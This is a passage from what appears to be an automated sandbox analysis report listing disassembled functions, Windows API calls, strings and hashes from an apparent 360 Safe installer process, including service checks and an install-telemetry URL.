Instruction Fuzzy Hash: B611B6B1A41228BBD720EBA69C4DEFB7BACEF19721F104551FA15D3081DA709E44CBB0

Function 00AE5637 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00AE563E
GetDC.USER32(00000000), ref: 00AE564B

Part of subcall function 00AE548F: _memset.LIBCMT ref: 00AE54B5
Part of subcall function 00AE548F: GetVersionExW.KERNEL32(?), ref: 00AE54C8

EnumFontFamiliesW.GDI32(00000000,00000000,00AE559A), ref: 00AE5666
ReleaseDC.USER32(00000000,00000000), ref: 00AE56BF
CreateFontW.GDI32(000000F4,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000086,00000000,00000000,00000000,00000020,?), ref: 00AE56DF

Strings

Tahoma, xrefs: 00AE56A0

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Font$CreateEnumFamiliesH_prolog3_catchReleaseVersion_memset
String ID: Tahoma
API String ID: 3542596840-3580928618
Opcode ID: 0c9e3126da082b82c6f005afdc4a9c7abe7c4bdebb71f1c8838da5b0b1b8b60a
Instruction ID: fa2e80dafa1eb1cc9641a5b3e508922ac527e0ef9f9209f6dfd5a8d56df79595
Opcode Fuzzy Hash: 0c9e3126da082b82c6f005afdc4a9c7abe7c4bdebb71f1c8838da5b0b1b8b60a
Instruction Fuzzy Hash: 0B11E331500BC07AD230A7B39D09FA73EA8DBCAB14F44C80CF56A861D0DBA89480CB20

Function 6C68C60D Relevance: 10.6, APIs: 7, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0000000D,?,6C5E4437,?,6C5E4D1D,00000000,00000000,?,?,6C654DB4,?,?,?,?,?), ref: 6C68C58E
HeapAlloc.KERNEL32(00000000,?,6C5E4D1D,00000000,00000000,?,?,6C654DB4,?,?,?,?,?,00000001,?,?), ref: 6C68C595

Part of subcall function 6C68C4A6: IsProcessorFeaturePresent.KERNEL32(0000000C,6C68C57C,?,6C5E4437,?,6C5E4D1D,00000000,00000000,?,?,6C654DB4,?,?,?,?,?), ref: 6C68C4A8

RtlInterlockedPopEntrySList.NTDLL(0085A758), ref: 6C68C5A2
VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,6C5E4D1D,00000000,00000000,?,?,6C654DB4,?,?,?,?,?), ref: 6C68C5B7
RtlInterlockedPopEntrySList.NTDLL(00000000), ref: 6C68C5D0
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C5E4D1D,00000000,00000000,?,?,6C654DB4,?,?,?,?,?,00000001), ref: 6C68C5E4
RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 6C68C5FB

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: EntryInterlockedList$AllocHeapVirtual$FeatureFreePresentProcessProcessorPush
String ID:
API String ID: 2304957937-0
Opcode ID: a6ec332b9be13f91b36c0d967cc2991af3e01b45deeb1467902093b0e9ce87a4
Instruction ID: 60c0a8623ccf2ad035006ca46f6c3c3658292bb65d7e21d321415fd1bf60f703
Opcode Fuzzy Hash: a6ec332b9be13f91b36c0d967cc2991af3e01b45deeb1467902093b0e9ce87a4
Instruction Fuzzy Hash: 1301C4723472107BEF11663AEC48F8A7BB9AB82B15F154238F502E7680DF60C8508B7D

Function 00ADD372 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51serviceCOMMON

Download Yara Rule

APIs

Part of subcall function 00AD8657: _memset.LIBCMT ref: 00AD867B
Part of subcall function 00AD8657: _memset.LIBCMT ref: 00AD868C
Part of subcall function 00AD8657: GetVersionExW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AD86A1
Part of subcall function 00AD8657: GetVersionExW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AD86B2
Part of subcall function 00AD8657: GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,00000000), ref: 00AD86C2
Part of subcall function 00AD8657: GetProcAddress.KERNEL32(00000000), ref: 00AD86C9
Part of subcall function 00AD8657: GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AD86D7

OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,00000000,?,?,?,?,?,00ADEAAD,?,?,00100000,00000000,0000008C), ref: 00ADD391
OpenServiceW.ADVAPI32(00000000,360FsFlt,00000034,?,?,?,?,00ADEAAD,?,?,00100000,00000000,0000008C), ref: 00ADD3A5
QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,0000008C,?,?,?,?,00ADEAAD,?,?,00100000,00000000,0000008C), ref: 00ADD3BD
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,00ADEAAD,?,?,00100000,00000000,0000008C), ref: 00ADD3D5
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,00ADEAAD,?,?,00100000,00000000,0000008C), ref: 00ADD3D8

Strings

360FsFlt, xrefs: 00ADD39F

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Service$Handle$CloseOpenVersion_memset$AddressInfoManagerModuleNativeProcQueryStatusSystem
String ID: 360FsFlt
API String ID: 470164251-3852983893
Opcode ID: 5392680b1546b953c9681f94386add2f9be4372461248b6d631b202906419056
Instruction ID: 0d5cc98156975c59ea52f06d310183930778da8f231190cf092428e9af865167
Opcode Fuzzy Hash: 5392680b1546b953c9681f94386add2f9be4372461248b6d631b202906419056
Instruction Fuzzy Hash: CDF0A4726002186FE7306BA99CC9DBF76ACDB44798B000026F612FB240DFA0DD46A672

Function 6C601C33 Relevance: 9.1, APIs: 6, Instructions: 96threadCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C601C52
GdiplusStartup.GDIPLUS(?,?,00000000,00000018), ref: 6C601C74
_memset.LIBCMT ref: 6C601CBE
GetCurrentDirectoryW.KERNEL32(00000400,00000000), ref: 6C601CCF
GetCurrentThreadId.KERNEL32 ref: 6C601D0A
SetWindowsHookExW.USER32(00000003,6C5ED3E5,00000000,00000000), ref: 6C601D19

Part of subcall function 6C5F537A: __EH_prolog3_catch.LIBCMT ref: 6C5F5381

Memory Dump Source

Source File: 0000000F.00000002.2578652771.000000006C5D1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 0000000F.00000002.2578613735.000000006C5D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578764889.000000006C6B5000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578811722.000000006C6D9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6DB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6E0000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2578843526.000000006C6FF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579003199.000000006C700000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.2579038423.000000006C706000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c5d0000_inst.jbxd

Similarity

API ID: Current$DirectoryGdiplusH_prolog3H_prolog3_catchHookStartupThreadWindows_memset
String ID:
API String ID: 3120476819-0
Opcode ID: c07486d806bca4af5eafce49ce6153dd9497384cf9ded2cf8ba83910bb066419
Instruction ID: 754d6aeee57ae4fdbf5546b4189e5fcb7dff4419fc362f44ffc39548661628fa
Opcode Fuzzy Hash: c07486d806bca4af5eafce49ce6153dd9497384cf9ded2cf8ba83910bb066419
Instruction Fuzzy Hash: 903170B1A01209DFDB04DFA4C984AEDB7F8FF49308F50452EE545E7680DB359A09CBA8

Function 00A917D4 Relevance: 9.1, APIs: 6, Instructions: 51timefileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000080,00000000), ref: 00A917F0
DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00A91808
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A91831
SetFileTime.KERNEL32(00000000,?,00000000,?), ref: 00A9183F
CloseHandle.KERNEL32(00000000), ref: 00A91846
SetFileAttributesW.KERNEL32(?,?), ref: 00A91853

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: File$Time$AttributesCloseCreateDateHandleLocal
String ID:
API String ID: 820720069-0
Opcode ID: 0ceb301294b97287c93b310bf1de2701108fe2b282d0c10b76a365f37c0f6842
Instruction ID: 2c08022395642a98481a2989e93a739a104a75a8d8458d2949a8d80475f63d53
Opcode Fuzzy Hash: 0ceb301294b97287c93b310bf1de2701108fe2b282d0c10b76a365f37c0f6842
Instruction Fuzzy Hash: E3115B76A00219BBEB21DFA4DC49FEE7BB8EB04711F044025F921A7190DB70EA529B64

Function 00AB73D5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00AB73F4
_memset.LIBCMT ref: 00AB7422

Part of subcall function 00AF3480: _memset.LIBCMT ref: 00AF34C1
Part of subcall function 00AF3480: _memset.LIBCMT ref: 00AF34DE
Part of subcall function 00AF3480: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,00B5CDA4,00000000), ref: 00AF34ED

Part of subcall function 00AB71E2: _memset.LIBCMT ref: 00AB7216
Part of subcall function 00AB71E2: SHGetValueW.SHLWAPI(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe,Path,?,?,?,?,?,00B5CDA4), ref: 00AB7239
Part of subcall function 00AB71E2: PathCombineW.SHLWAPI(?,?,360safe.exe,?,?,?,00B5CDA4), ref: 00AB7269
Part of subcall function 00AB71E2: PathFileExistsW.SHLWAPI(?,?,?,00B5CDA4), ref: 00AB7273

Strings

&pid=, xrefs: 00AB74CF
http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&installed=%d, xrefs: 00AB7473
&ver=, xrefs: 00AB74AF

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: _memset$Path$CombineExistsFileH_prolog3Valuelstrlen
String ID: &pid=$&ver=$http://s.360.cn/safe/instcomp.htm?soft=%d&status=%d&m=%s&from=%s&vv=10&installed=%d
API String ID: 3972583164-2772831180
Opcode ID: bf1a137d5ce4db50d3e7c712949310370358197db6319d908b0cdc5434e4cac7
Instruction ID: 93ca0305d68613e536362320e8d99bcdfa8369922db6a43a23dc1bb3a95713eb
Opcode Fuzzy Hash: bf1a137d5ce4db50d3e7c712949310370358197db6319d908b0cdc5434e4cac7
Instruction Fuzzy Hash: D5317F7190021DAFDB14FBA4DD56AFEB7B8FF18305F008469B615A7192DB706A05CB21

Function 00AF28D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A82750: _vswprintf_s.LIBCMT ref: 00A82783

CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000104,00000000), ref: 00AF291E
DeviceIoControl.KERNEL32 ref: 00AF296D
CloseHandle.KERNEL32(00000000), ref: 00AF29BD

Strings

%02X%02X%02X%02X%02X%02X, xrefs: 00AF29A8
\\.\%s, xrefs: 00AF28EE

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_vswprintf_s
String ID: %02X%02X%02X%02X%02X%02X$\\.\%s
API String ID: 2864800763-1525991222
Opcode ID: ac2f2ce8eaf21b3683caa7abc74c2c291c3e3da4ca4453689de8bd43423c42e4
Instruction ID: 7073c22eb3e461d55bdb95373dd3343d5fa7045e79bd3386750ff283904b2c8b
Opcode Fuzzy Hash: ac2f2ce8eaf21b3683caa7abc74c2c291c3e3da4ca4453689de8bd43423c42e4
Instruction Fuzzy Hash: E121B5B15083546EE334EB65DCD6FFBB6ECAB8C715F40491DB6E483190D6B48A048762

Function 00AA869E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00AA86BD
_memset.LIBCMT ref: 00AA86F8
GetClassNameW.USER32(?,00000000,00000104), ref: 00AA870B

Part of subcall function 00A87FA1: __wcsicoll.LIBCMT ref: 00A87FB9

IsDialogMessageW.USER32(?,?), ref: 00AA8757

Strings

EDIT, xrefs: 00AA8727

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: ClassDialogH_prolog3MessageName__wcsicoll_memset
String ID: EDIT
API String ID: 858151411-3080729518
Opcode ID: 0f4f088763ac6173e2f7ae742eb2b55595e785cfa22f534c8f7e707703c21a94
Instruction ID: a737493d762f9b0daac28a0c054d82c24d832f8df67e50e08d0b9e4749a7817c
Opcode Fuzzy Hash: 0f4f088763ac6173e2f7ae742eb2b55595e785cfa22f534c8f7e707703c21a94
Instruction Fuzzy Hash: B02190759002089BDB34EF64DD49ABEB7A4EF15710F20892AF96AD72E1DF34A904CB50

Function 00A7E080 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44fileCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00A7E084
CreateFileW.KERNEL32 ref: 00A7E0AA
DeviceIoControl.KERNEL32(00000000,0022204C,00000000,00000004,00000000,00000004,00000000,00000000), ref: 00A7E0DA
CloseHandle.KERNEL32(00000000), ref: 00A7E0E3

Strings

\\.\360SelfProtection, xrefs: 00A7E099

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: CloseControlCreateCurrentDeviceFileHandleProcess
String ID: \\.\360SelfProtection
API String ID: 3778458602-936859468
Opcode ID: 2a78c675092f24b2e70723fe97d23724bcf534d0268a6c6d54f6cbce2b61545f
Instruction ID: 3d798237693c9129ab5233c35a32f9f97753679cb4af50acfff9e663d60fa46d
Opcode Fuzzy Hash: 2a78c675092f24b2e70723fe97d23724bcf534d0268a6c6d54f6cbce2b61545f
Instruction Fuzzy Hash: A0F0A4327443107BE221DB64EC06FAE77A4AB88F21F444618FB94E71D0D7B49609C7AB

Function 00AC1A42 Relevance: 7.6, APIs: 5, Instructions: 105COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00AC1A49
IsWindowEnabled.USER32(?), ref: 00AC1A5E
GetClientRect.USER32(?,?), ref: 00AC1A91
GetWindowTextW.USER32(?,00000000,00000080), ref: 00AC1AD7
IsWindowEnabled.USER32(?), ref: 00AC1B05

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Window$Enabled$ClientH_prolog3RectText
String ID:
API String ID: 968978764-0
Opcode ID: 45b73c632c2f13745c5e5f53eb7f9b5e11c2bea5e7d797d5c8793c3f267054ba
Instruction ID: 1ee25eb2215f2bb28739830ddd8310fcb0652aa62daca6004901d27fd416c9c9
Opcode Fuzzy Hash: 45b73c632c2f13745c5e5f53eb7f9b5e11c2bea5e7d797d5c8793c3f267054ba
Instruction Fuzzy Hash: 5C419C71A00609AFDB21DBA4CD40FFEBBF8FF44344F00442AF516A6191DB71AA41CB20

Function 00AC1D08 Relevance: 7.6, APIs: 5, Instructions: 102COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00AC1D0F
GetWindowTextW.USER32(?,00000000,00000064), ref: 00AC1D4E

Part of subcall function 00A8D354: _wcsnlen.LIBCMT ref: 00A8D36B

GetClientRect.USER32(?,?), ref: 00AC1D8B
IsWindowEnabled.USER32(?), ref: 00AC1DCE
OffsetRect.USER32(?,00000001,00000001), ref: 00AC1DEC

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: RectWindow$ClientEnabledH_prolog3OffsetText_wcsnlen
String ID:
API String ID: 2890302191-0
Opcode ID: 0b3e8f08e90f88a0677ead48c00d79ab27427eb59b7ea86d0108a8da2b39f756
Instruction ID: 992173ad8d5946ff0c32fe376dbf67fa0bec712d6fcdbf9f94323bf757a0ca20
Opcode Fuzzy Hash: 0b3e8f08e90f88a0677ead48c00d79ab27427eb59b7ea86d0108a8da2b39f756
Instruction Fuzzy Hash: DF4107B1D00619AFCF14DFA9CD85AEEBBF9FF48304F044519F616A6290DB71AA41CB60

Function 00AC1E2D Relevance: 7.6, APIs: 5, Instructions: 78COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00AC1E34
GetWindowTextW.USER32(?,00000000,00000064), ref: 00AC1E5D

Part of subcall function 00A8D354: _wcsnlen.LIBCMT ref: 00A8D36B

GetDC.USER32(?), ref: 00AC1E70
GetWindowRect.USER32(?,?), ref: 00AC1E8B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 00AC1EFC

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: Window$H_prolog3RectText_wcsnlen
String ID:
API String ID: 1157584674-0
Opcode ID: c8949aa70a5effafe1ecd21e1b4a43fee48598a8629066d56dea64a445e9d160
Instruction ID: 49185b22942c034998cb2d548241f996fdc31309e2bc4d143087608d977d560c
Opcode Fuzzy Hash: c8949aa70a5effafe1ecd21e1b4a43fee48598a8629066d56dea64a445e9d160
Instruction Fuzzy Hash: EC312671900609AFCB24EFA5CD85DFFBBB9FF85300F10051AE622A6291DB71A945CB21

Function 00ADA52B Relevance: 7.6, APIs: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(?), ref: 00ADA58E
SelectObject.GDI32(00000000,?), ref: 00ADA5B9
BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 00ADA5D6
SelectObject.GDI32(00000000,00000000), ref: 00ADA5DE
DeleteDC.GDI32(00000000), ref: 00ADA5F3

Part of subcall function 00ADA29F: GdipDrawImageRectI.GDIPLUS(?,00000000,?,?,?,?,?,?,00ADFC56,?,?,?,00000000,?,?), ref: 00ADA2C2

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572066890.0000000000B53000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572244179.0000000000B56000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000B60000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2572331345.0000000000E4D000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_a70000_inst.jbxd

Similarity

API ID: ObjectSelect$CompatibleCreateDeleteDrawGdipImageRect
String ID:
API String ID: 240731188-0
Opcode ID: 5c5965351c1dc1c4032b8aacb75bdc7b2d1bf5414a912575c0d5ef05cbec7b12
Instruction ID: 8518cf3ed6807727fefb6536aaa25b66bf56122c8b202316aa2ca023a9725ab7
Opcode Fuzzy Hash: 5c5965351c1dc1c4032b8aacb75bdc7b2d1bf5414a912575c0d5ef05cbec7b12
Instruction Fuzzy Hash: F521FA31500209EBCF21EF90DD41EAE7BB6FF64300F10455AF912A62A1DB71EA66EB51

Function 00A9DDD1 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A9DE07
_memset.LIBCMT ref: 00A9DE1E
_wcslen.LIBCMT ref: 00A9DE38
_wcslen.LIBCMT ref: 00A9DE48
SHFileOperationW.SHELL32(?,?,?,?,?,?,?,00ADE664,00000000,00000000,00ADE844,?,00000000,00ADE844,?,?), ref: 00A9DE6A

Memory Dump Source

Source File: 0000000F.00000002.2571589051.0000000000A71000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A70000, based on PE: true

Associated: 0000000F.00000002.2571457677.0000000000A70000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000F.00000002.2571976270.0000000000B2E000.00000002.00000001.01000000.0000000B.sdmpDownload File
